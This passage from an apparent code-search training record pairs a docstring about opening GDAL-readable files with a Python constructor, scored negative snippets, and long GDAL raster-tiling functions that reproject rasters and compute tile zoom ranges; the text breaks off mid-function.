ret\n except Exception:\n return None", "def latestValue(self):\n if len(self.values) > 0:\n return self.values[-1]\n else:\n return 0", "def getValue(self) -> int:\n ...", "def next(self):\n n, self.iter = self.nums[self.iter], self.iter+1\n return n", "def value(self):\n return _osgAnimation.SwigPyIterator_value(self)", "def _get_value(self):\n return self.__value", "def value(self):\n if hasattr(self, '_m_value'):\n return self._m_value if hasattr(self, '_m_value') else None\n\n self._m_value = (self.b & 127)\n return self._m_value if hasattr(self, '_m_value') else None", "def get(self, index):\n if index >= self.len:\n return -1\n p = self.head.next\n while index > 0:\n index -= 1\n p = p.next\n return p.val", "def next(self):\n return next(self.gen)" ]
[ "0.69069135", "0.6903918", "0.68510103", "0.6794112", "0.6782542", "0.66370076", "0.66035736", "0.65092635", "0.6481222", "0.6430199", "0.6414499", "0.6410997", "0.63769144", "0.63592046", "0.63583064", "0.63552517", "0.63462645", "0.63152736", "0.6294821", "0.62673527", "0.62468565", "0.62436676", "0.62436676", "0.62214273", "0.6199272", "0.6186351", "0.61850303", "0.6164596", "0.61604047", "0.6148999", "0.61227494", "0.61227494", "0.6120474", "0.6105034", "0.6093133", "0.6081499", "0.60768473", "0.6039049", "0.6034145", "0.60310954", "0.6006239", "0.5993654", "0.59921926", "0.59907025", "0.59854513", "0.5982865", "0.5982694", "0.5981716", "0.59811467", "0.59754896", "0.5967847", "0.5945388", "0.5940692", "0.5926408", "0.5921525", "0.5920828", "0.59208125", "0.591883", "0.59175825", "0.5917147", "0.59075195", "0.589737", "0.58773345", "0.5871988", "0.5871504", "0.58639276", "0.5853242", "0.58406776", "0.58404326", "0.58304346", "0.58259296", "0.58254045", "0.581069", "0.5802216", "0.58016706", "0.57952255", "0.5793001", "0.57927775", "0.5792605", "0.5785569", "0.57830656", "0.5766482", "0.57641965", "0.57547677", "0.5742776", "0.5741573", "0.57335067", "0.5731173", "0.5731173", "0.5731173", "0.5724478", "0.57240343", "0.57191503", "0.57187617", "0.5717772", "0.57150465", "0.5712302", "0.5705474", "0.5705355", "0.5693724", "0.5683531" ]
0.0
-1
Opens a GDALreadable file. Raises a GdalError if inputfile is invalid.
def __init__(self, inputfile, mode=GA_ReadOnly): # Open the input file and read some metadata open(inputfile, 'r').close() # HACK: GDAL gives a useless exception if not isinstance(inputfile, bytes): inputfile = inputfile.encode('utf-8') try: # Since this is a SWIG object, clone the ``this`` pointer self.this = gdal.Open(inputfile, mode).this except RuntimeError as e: raise GdalError(str(e)) # Shadow for metadata so we can overwrite it without saving # it to the original file. self._geotransform = None self._rastersizes = None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load(self):\r\n\r\n #Open the dataset read only using GDAL\r\n dataset = gdal.Open(self.inputds, gdal.GA_ReadOnly)\r\n \r\n return dataset\r\n \r\n\r\n #print \"Failed to open %s. Is it a GDAL supported format?\" %(self.inputds)\r", "def open_input(self):\n gdal.AllRegister()\n\n self.out_drv = gdal.GetDriverByName(self.tiledriver)\n self.mem_drv = gdal.GetDriverByName('MEM')\n\n if not self.out_drv:\n raise Exception(\"The '%s' driver was not found, is it available in this GDAL build?\",\n self.tiledriver)\n if not self.mem_drv:\n raise Exception(\"The 'MEM' driver was not found, is it available in this GDAL build?\")\n\n # Open the input file\n\n if self.input_file:\n input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print(\"Input file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n if not input_dataset:\n # Note: GDAL prints the ERROR message too\n exit_with_error(\"It is not possible to open the input file '%s'.\" % self.input_file)\n\n # Read metadata from the input file\n if input_dataset.RasterCount == 0:\n exit_with_error(\"Input file '%s' has no raster band\" % self.input_file)\n\n if input_dataset.GetRasterBand(1).GetRasterColorTable():\n exit_with_error(\n \"Please convert this file to RGB/RGBA and run gdal2tiles on the result.\",\n \"From paletted file you can create RGBA file (temp.vrt) by:\\n\"\n \"gdal_translate -of vrt -expand rgba %s temp.vrt\\n\"\n \"then run:\\n\"\n \"gdal2tiles temp.vrt\" % self.input_file\n )\n\n in_nodata = setup_no_data_values(input_dataset, self.options)\n\n if self.options.verbose:\n print(\"Preprocessed file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)\n\n self.out_srs = setup_output_srs(in_srs, self.options)\n\n # If input and output reference systems are different, we reproject the input dataset into\n # the output reference system for easier manipulation\n\n self.warped_input_dataset = None\n\n if self.options.profile in ('mercator', 'geodetic'):\n\n if not in_srs:\n exit_with_error(\n \"Input file has unknown SRS.\",\n \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\")\n\n if not has_georeference(input_dataset):\n exit_with_error(\n \"There is no georeference - neither affine transformation (worldfile) \"\n \"nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2tiles with parameter -p 'raster' or use another GIS \"\n \"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs\"\n )\n\n if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or\n (input_dataset.GetGCPCount() != 0)):\n self.warped_input_dataset = reproject_dataset(\n input_dataset, in_srs, self.out_srs)\n\n if in_nodata:\n self.warped_input_dataset = update_no_data_values(\n self.warped_input_dataset, in_nodata, options=self.options)\n else:\n self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(\n self.warped_input_dataset, options=self.options)\n\n if self.warped_input_dataset and self.options.verbose:\n print(\"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (\n self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize,\n self.warped_input_dataset.RasterCount))\n\n if not self.warped_input_dataset:\n self.warped_input_dataset = input_dataset\n\n #Salva o arquivo reprojetado\n self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,\n self.warped_input_dataset)\n\n # Get alpha band (either directly or from NODATA value)\n self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()\n self.dataBandsCount = nb_data_bands(self.warped_input_dataset)\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print(\"KML autotest OK!\")\n\n # Read the georeference\n self.out_gt = self.warped_input_dataset.GetGeoTransform()\n\n # Test the size of the pixel\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0, 0):\n exit_with_error(\"Georeference of the raster contains rotation or skew. \"\n \"Such raster is not supported. Please use gdalwarp first.\")\n\n # Here we expect: pixel is square, no rotation on the raster\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n\n if self.options.verbose:\n print(\"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)\n\n # Calculating ranges for tiles in different zoom levels\n if self.options.profile == 'mercator':\n\n self.mercator = GlobalMercator()\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz is None:\n self.tminz = self.mercator.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\",\n self.mercator.MetersToLatLon(self.ominx, self.ominy),\n self.mercator.MetersToLatLon(self.omaxx, self.omaxy))\n print('MinZoomLevel:', self.tminz)\n print(\"MaxZoomLevel:\",\n self.tmaxz,\n \"(\",\n self.mercator.Resolution(self.tmaxz),\n \")\")\n\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic(self.options.tmscompatible)\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tminz is None:\n self.tminz = self.geodetic.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy)\n\n if self.options.profile == 'raster':\n\n def log2(x):\n return math.log10(x) / math.log10(2)\n\n self.nativezoom = int(\n max(math.ceil(log2(self.warped_input_dataset.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.warped_input_dataset.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print(\"Native zoom of the raster:\", self.nativezoom)\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz is None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz is None:\n self.tmaxz = self.nativezoom\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, self.tmaxz+1))\n self.tsize = list(range(0, self.tmaxz+1))\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1\n tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n ct = osr.CoordinateTransformation(in_srs, srs4326)\n\n def rastertileswne(x, y, z):\n pixelsizex = (2**(self.tmaxz-z) * self.out_gt[1]) # X-pixel size in level\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = ct.TransformPoint(west, south)[:2]\n east, north = ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa", "def open_image(filename):\n\n dataset = gdal.Open(filename, gdal.GA_ReadOnly)\n if dataset is None:\n raise IOError(\"cannot open %s\" % filename)\n\n return GdalImage(dataset, filename)", "def open_input(self):\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"YES\")\n gdal.AllRegister()\n # self.options.verbose=True\n if self.options.tms_osm:\n self.s_y_type=\"osm\"\n else:\n self.s_y_type=\"tms\"\n if self.options.verbose:\n print \"open_input :\", self.input,\" osm[\",self.options.tms_osm,\",\",self.s_y_type,\"] mbtiles[\",self.options.mbtiles,\"] mbtiles_todisk[\",self.options.mbtiles_todisk,\"] mbtiles_fromdisk[\",self.options.mbtiles_fromdisk,\"]\";\n # Open the input file\n if self.input:\n self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print \"Input file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n if not self.in_ds:\n # Note: GDAL prints the ERROR message too\n self.error(\"It is not possible to open the input file '%s'.\" % self.input )\n\n # Read metadata from the input file\n if self.in_ds.RasterCount == 0:\n self.error( \"Input file '%s' has no raster band\" % self.input )\n\n if self.in_ds.GetRasterBand(1).GetRasterColorTable():\n # TODO: Process directly paletted dataset by generating VRT in memory\n self.error( \"Please convert this file to RGB/RGBA and run gdal2mbtiles on the result.\",\n \"\"\"From paletted file you can create RGBA file (temp.vrt) by:\ngdal_translate -of vrt -expand rgba %s temp.vrt\nthen run:\ngdal2mbtiles temp.vrt\"\"\" % self.input )\n\n # Get NODATA value\n # User supplied values overwrite everything else.\n if self.options.srcnodata is not None:\n nds = map(float, self.options.srcnodata.split(','))\n if len(nds) < self.in_ds.RasterCount:\n self.in_nodata = (nds * self.in_ds.RasterCount)[:self.in_ds.RasterCount]\n else:\n self.in_nodata = nds\n else:\n # If the source dataset has NODATA, use it.\n self.in_nodata = []\n for i in range(1, self.in_ds.RasterCount+1):\n if self.in_ds.GetRasterBand(i).GetNoDataValue() != None:\n self.in_nodata.append( self.in_ds.GetRasterBand(i).GetNoDataValue() )\n\n if self.options.verbose:\n print \"NODATA: %s\" % self.in_nodata\n\n # INIT DEST\n if self.options.init_dest is not None:\n if self.options.tile_format == \"jpeg\":\n if self.in_ds.RasterCount == 4:\n nbands = 3\n else:\n nbands = self.in_ds.RasterCount\n\n nds = map(float, self.options.init_dest.split(','))\n\n if len(nds) == 1:\n init_dest = nds * nbands\n elif len(nds) == nbands:\n init_dest = nds\n else:\n print \"WARNING: you suplied %d '--init-dest' values but the dataset has %d data bands\" % (len(nds), nbands)\n init_dest = None\n else:\n init_dest = None\n print \"WARNING: --init-dest can be used only with 'jpeg' tile format\"\n else:\n if self.options.tile_format == \"jpeg\":\n init_dest = [255,255,255]\n else:\n init_dest = None\n\n #\n # Here we should have RGBA input dataset opened in self.in_ds\n #\n\n if self.options.verbose:\n print \"Preprocessed file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n # Spatial Reference System of the input raster\n\n\n self.in_srs = None\n\n if self.options.s_srs:\n self.in_srs = osr.SpatialReference()\n self.in_srs.SetFromUserInput(self.options.s_srs)\n self.in_srs_wkt = self.in_srs.ExportToWkt()\n else:\n self.in_srs_wkt = self.in_ds.GetProjection()\n if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:\n self.in_srs_wkt = self.in_ds.GetGCPProjection()\n if self.in_srs_wkt:\n self.in_srs = osr.SpatialReference()\n self.in_srs.ImportFromWkt(self.in_srs_wkt)\n #elif self.options.profile != 'raster':\n # self.error(\"There is no spatial reference system info included in the input file.\",\"You should run gdal2mbtiles with --s_srs EPSG:XXXX or similar.\")\n\n # Spatial Reference System of tiles\n\n self.out_srs = osr.SpatialReference()\n\n if self.options.profile == 'mercator':\n self.out_srs.ImportFromEPSG(900913)\n elif self.options.profile in ('geodetic', 'gearth', 'garmin'):\n self.out_srs.ImportFromEPSG(4326)\n else:\n self.out_srs = self.in_srs\n\n # Are the reference systems the same? Reproject if necessary.\n\n self.out_ds = None\n\n if self.options.profile in ('mercator', 'geodetic', 'gearth', 'garmin'):\n\n if (self.in_ds.GetGeoTransform() == (0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) and (self.in_ds.GetGCPCount() == 0):\n self.error(\"There is no georeference - neither affine transformation (worldfile) nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2mbtiles with parameter -p 'raster' or use another GIS software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs\")\n\n if self.in_srs:\n\n if (self.in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (self.in_ds.GetGCPCount() != 0):\n\n # Generation of VRT dataset in tile projection, default 'nearest neighbour' warping\n self.out_ds = gdal.AutoCreateWarpedVRT( self.in_ds, self.in_srs_wkt, self.out_srs.ExportToWkt() )\n\n # TODO: HIGH PRIORITY: Correction of AutoCreateWarpedVRT according the max zoomlevel for correct direct warping!!!\n\n if self.options.verbose:\n print \"Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')\"\n self.out_ds.GetDriver().CreateCopy(\"tiles.vrt\", self.out_ds)\n\n # Note: self.in_srs and self.in_srs_wkt contain still the non-warped reference system!!!\n\n # Correction of AutoCreateWarpedVRT for NODATA values\n if self.in_nodata != []:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<GDALWarpOptions>\"\"\",\"\"\"<GDALWarpOptions>\n <Option name=\"UNIFIED_SRC_NODATA\">YES</Option>\n <Option name=\"INIT_DEST\">NO_DATA</Option>\"\"\")\n # replace BandMapping tag for NODATA bands....\n if init_dest is None:\n dstnodata = self.in_nodata\n else:\n dstnodata = init_dest\n for i in range(len(self.in_nodata)):\n s = s.replace(\"\"\"<BandMapping src=\"%i\" dst=\"%i\"/>\"\"\" % ((i+1),(i+1)),\"\"\"<BandMapping src=\"%i\" dst=\"%i\">\n <SrcNoDataReal>%i</SrcNoDataReal>\n <SrcNoDataImag>0</SrcNoDataImag>\n <DstNoDataReal>%i</DstNoDataReal>\n <DstNoDataImag>0</DstNoDataImag>\n </BandMapping>\"\"\" % ((i+1), (i+1), self.in_nodata[i], dstnodata[i]))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n # set NODATA_VALUE metadata\n self.out_ds.SetMetadataItem('NODATA_VALUES','%s' % \" \".join(str(int(f)) for f in self.in_nodata))\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # -----------------------------------\n # Correction of AutoCreateWarpedVRT for Mono (1 band) and RGB (3 bands) files without NODATA:\n # equivalent of gdalwarp -dstalpha\n elif self.in_nodata == [] and self.out_ds.RasterCount in (1,3):\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<BlockXSize>\"\"\",\"\"\"<VRTRasterBand dataType=\"Byte\" band=\"%i\" subClass=\"VRTWarpedRasterBand\">\n <ColorInterp>Alpha</ColorInterp>\n </VRTRasterBand>\n <BlockXSize>\"\"\" % (self.out_ds.RasterCount + 1))\n s = s.replace(\"\"\"</GDALWarpOptions>\"\"\", \"\"\"<DstAlphaBand>%i</DstAlphaBand>\n </GDALWarpOptions>\"\"\" % (self.out_ds.RasterCount + 1))\n if init_dest is None:\n init_dest_str = \"0\"\n else:\n init_dest_str = \",\".join(str(f) for f in init_dest)\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % init_dest_str)\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print \"Modified -dstalpha warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n elif init_dest is not None:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % \",\".join(str(f) for f in init_dest))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # For raster with 4-bands: 4th unknown band set to alpha\n if (self.out_ds.RasterCount == 4\n and self.out_ds.GetRasterBand(4).GetRasterColorInterpretation() == gdal.GCI_Undefined):\n self.out_ds.GetRasterBand(4).SetRasterColorInterpretation(gdal.GCI_AlphaBand)\n\n s = '''\n '''\n\n else:\n self.error(\"Input file has unknown SRS.\", \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\" )\n\n if self.out_ds and self.options.verbose:\n print \"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (self.out_ds.RasterXSize, self.out_ds.RasterYSize, self.out_ds.RasterCount)\n\n if not self.out_ds:\n self.out_ds = self.in_ds\n\n #\n # Here we should have a raster (out_ds) in the correct Spatial Reference system\n #\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print \"KML autotest OK!\"\n\n # Read the georeference\n\n self.out_gt = self.out_ds.GetGeoTransform()\n\n #originX, originY = self.out_gt[0], self.out_gt[3]\n #pixelSize = self.out_gt[1] # = self.out_gt[5]\n\n # Test the size of the pixel\n\n # MAPTILER - COMMENTED\n #if self.out_gt[1] != (-1 * self.out_gt[5]) and self.options.profile != 'raster':\n # TODO: Process corectly coordinates with are have swichted Y axis (display in OpenLayers too)\n #self.error(\"Size of the pixel in the output differ for X and Y axes.\")\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0,0):\n self.error(\"Georeference of the raster contains rotation or skew. Such raster is not supported. Please use gdalwarp first.\")\n # TODO: Do the warping in this case automaticaly\n\n #\n # Here we expect: pixel is square, no rotation on the raster\n #\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0]+self.out_ds.RasterXSize*self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3]-self.out_ds.RasterYSize*self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n # user defined bounds to extract - coordinates in the output SRS\n if self.options.te_bounds != '':\n if self.te_minx >= self.ominx and self.te_minx <= self.omaxx:\n if self.te_maxx >= self.ominx and self.te_maxx <= self.omaxx:\n if self.te_miny >= self.ominy and self.te_miny <= self.omaxy:\n if self.te_maxy >= self.ominy and self.te_maxy <= self.omaxy:\n # replace only if inside the read bounds\n self.ominx = self.te_minx\n self.omaxx = self.te_maxx\n self.ominy = self.te_miny\n self.omaxy = self.te_maxy\n if self.options.verbose:\n print \"User defined Bounds (output srs) have been set:\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.verbose:\n print \"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.mbtiles:\n self.options.profile = 'mercator'\n if self.options.profile == 'mercator':\n self.mercator = GlobalMercator(self.options.tms_osm) # from globalmaptiles.py\n\n #\n # Calculating ranges for tiles in different zoom levels\n #\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.mercator.MetersToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz == None:\n self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.mercator.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.mercator.MetersToLatLon( self.ominx, self.ominy), self.mercator.MetersToLatLon( self.omaxx, self.omaxy)\n print 'MinZoomLevel:', self.tminz\n print \"MaxZoomLevel:\", self.tmaxz, \"(\", self.mercator.Resolution( self.tmaxz ),\")\"\n\n # this must be call befor ImageOutput is called (self.output may be changed)\n if self.options.mbtiles:\n if not self.mbtiles_db:\n self.mbtiles_setup(1);\n\n # Instantiate image output.\n self.image_output = ImageOutput(self.options.tile_format, self.out_ds, self.tilesize,\n self.options.resampling, init_dest, self.output,\n self.options.verbose,self.options.mbtiles)\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic() # from globalmaptiles.py\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LatLonToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.geodetic.LatLonToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tminz == None:\n self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.geodetic.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy\n\n if self.options.profile in ('raster', 'gearth', 'garmin'):\n\n log2 = lambda x: math.log10(x) / math.log10(2) # log2 (base 2 logarithm)\n\n self.nativezoom = int(max( math.ceil(log2(self.out_ds.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.out_ds.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print \"Native zoom of the raster:\", self.nativezoom\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz == None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz == None:\n self.tmaxz = self.nativezoom\n\n # Garmin has maximally 100 tiles - lower the tmaxz if necessary\n if self.options.profile == 'garmin':\n tno = math.ceil(self.out_ds.RasterXSize / self.tilesize) * math.ceil(self.out_ds.RasterYSize / self.tilesize)\n for tz in range(self.tmaxz, 1, -1):\n if tno > 100:\n tno /= 4\n self.tmaxz -= 1\n print \"Warning: GARMIN has a limit 100 tiles per device: lowering the max zoom level to:\", self.tmaxz\n else:\n continue\n\n # Force only one zoom level for the 'garmin' tile profile\n if self.options.profile == 'garmin':\n self.tminz = self.tmaxz\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0, self.tmaxz+1)\n self.tsize = range(0, self.tmaxz+1)\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil( self.out_ds.RasterXSize / tsize )) - 1\n tmaxy = int(math.ceil( self.out_ds.RasterYSize / tsize )) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n self.ct = osr.CoordinateTransformation(self.in_srs, srs4326)\n def rastertileswne(x,y,z):\n pixelsizex = (2**(self.nativezoom-z) * self.out_gt[1]) # X-pixel size in level\n pixelsizey = (2**(self.nativezoom-z) * self.out_gt[5]) # Y-pixel size in level (usually -1*pixelsizex)\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + 